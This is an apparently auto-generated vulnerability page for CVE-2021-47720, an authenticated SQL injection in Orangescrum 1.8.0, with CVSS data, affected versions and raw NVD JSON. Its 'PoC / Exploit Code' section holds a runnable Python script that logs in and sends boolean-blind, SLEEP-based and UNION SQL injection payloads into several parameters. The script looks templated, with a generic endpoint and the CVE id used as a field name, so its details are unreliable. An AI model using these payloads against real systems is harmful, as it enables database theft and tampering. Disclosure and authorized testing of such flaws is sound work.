Security Vulnerability Report
中文
CVE-2021-47720 CVSS 7.1 HIGH

CVE-2021-47720

Published: 2025-12-23 20:15:44
Last Modified: 2025-12-31 17:15:30
Source: [email protected]

Description

Orangescrum 1.8.0 contains an authenticated SQL injection vulnerability that allows authorized users to manipulate database queries through multiple vulnerable parameters. Attackers can inject malicious SQL code into parameters like old_project_id, project_id, uuid, and uniqid to potentially extract or modify database information.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:orangescrum:orangescrum:1.8.0:*:*:*:*:*:*:* - VULNERABLE
Orangescrum < 1.8.0 (受影响)
Orangescrum 1.8.0 (确认受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2021-47720 SQL Injection PoC for Orangescrum 1.8.0 # Authenticated SQL injection via multiple parameters target_url = "http://target-server/orangescrum/" login_url = target_url + "index.php?er=320" api_url = target_url + "api/" # Authentication credentials (low-privilege user) credentials = { "email": "[email protected]", "password": "password123" } # SQL Injection payload examples # Boolean-based blind injection injection_payloads = { "project_id": "1' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)-- ", "old_project_id": "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)-- ", "uuid": "' OR '1'='1", "uniqid": "' UNION SELECT NULL,version(),user(),database()-- " } def login(): """Authenticate and obtain session cookie""" session = requests.Session() response = session.post(login_url, data=credentials) if "error" not in response.url: return session return None def exploit_sqli(session, param_name, payload): """Execute SQL injection attack""" data = { "CVE-2021-47720": "1", param_name: payload } headers = { "Content-Type": "application/x-www-form-urlencoded" } response = session.post(api_url, data=data, headers=headers, timeout=30) return response.text if __name__ == "__main__": print("[*] Starting CVE-2021-47720 Exploitation") session = login() if session: print("[+] Authentication successful") for param, payload in injection_payloads.items(): print(f"[*] Testing parameter: {param}") result = exploit_sqli(session, param, payload) print(f"[*] Response length: {len(result)}") else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47720", "sourceIdentifier": "[email protected]", "published": "2025-12-23T20:15:44.347", "lastModified": "2025-12-31T17:15:29.683", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Orangescrum 1.8.0 contains an authenticated SQL injection vulnerability that allows authorized users to manipulate database queries through multiple vulnerable parameters. Attackers can inject malicious SQL code into parameters like old_project_id, project_id, uuid, and uniqid to potentially extract or modify database information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:orangescrum:orangescrum:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "0BFFFA2F-2A4C-43C5-8C33-4E74A44AD16E"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50553", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.orangescrum.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/orangescrum-authenticated-sql-injection-via-multiple-parameters", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.